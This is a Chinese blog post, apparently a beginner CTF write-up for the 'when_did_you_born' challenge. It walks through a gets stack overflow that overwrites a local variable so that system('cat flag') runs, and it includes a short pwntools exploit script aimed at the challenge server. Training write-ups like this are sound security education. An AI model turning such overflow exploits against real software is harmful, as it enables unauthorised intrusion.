攻防世界新手区when_did_you_born

字数:425字 | 预计阅读时长:1分钟

[攻防世界]新手区when_did_you_born

还是先看文件信息及防护措施
checksec检查文件
64位文件用64IDA打开,先看字符串窗口,找可利用的字符串


发现main里有system(“cat flag”),走到这一步的条件是一开始v5不能等于1926,进入else,然后v5又得等于1926,才能执行system(“cat flag”)这一句。由于开启了canary,所以没法直接覆盖返回地址到system(“cat flag”),所以试试利用gets来进行栈溢出,覆盖v5的值,让它在进入else里以后变成1926。

思路:

  1. 输入生日时,随便输一个数字,只要不是1926就行,来达到else中
  2. 利用gets栈溢出,覆盖之前输入的数字,把它变成1926
  3. 执行system(“cat flag”)拿到flag

    EXP:

1
2
3
4
5
6
7
8
from pwn import *

payload = 'a'*8 + p64(0x00000786)

p = remote('111.198.29.45',31215)
p.sendlineafter('Your Birth?','666')
p.sendlineafter('Your Name?',payload)
p.interactive()

payload解释:

  1. ‘a’*8:看栈算v20和v18的距离,这里v20就是v5,v18就是v4

    地址0x00000020和0x00000018之间距离为8,所以填充8个’a’
  2. p64(0x00000786):1926的16进制值,用于覆盖之前输入的’666’

关于canary:

开了canary后,就会在返回地址之前放一个值,如果想要覆盖返回地址到指定位置,那么就不得不先覆盖掉这个值,但是canary保护会检查这个值是否被改写,如果和以前的值不一样,那么程序会直接终止,要用一些其他方法来绕过或者利canary本身弱点来攻击。所以开启canary后,不能直接覆盖返回地址到指定位置,但是这道题可以直接覆盖v5的值来拿到flag,不用将返回地址覆盖到system。

好活儿,当赏!

微信

扫一扫,分享到微信

微信分享二维码

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

<br>力拔山兮气盖世<br>时不利兮骓不逝
/* */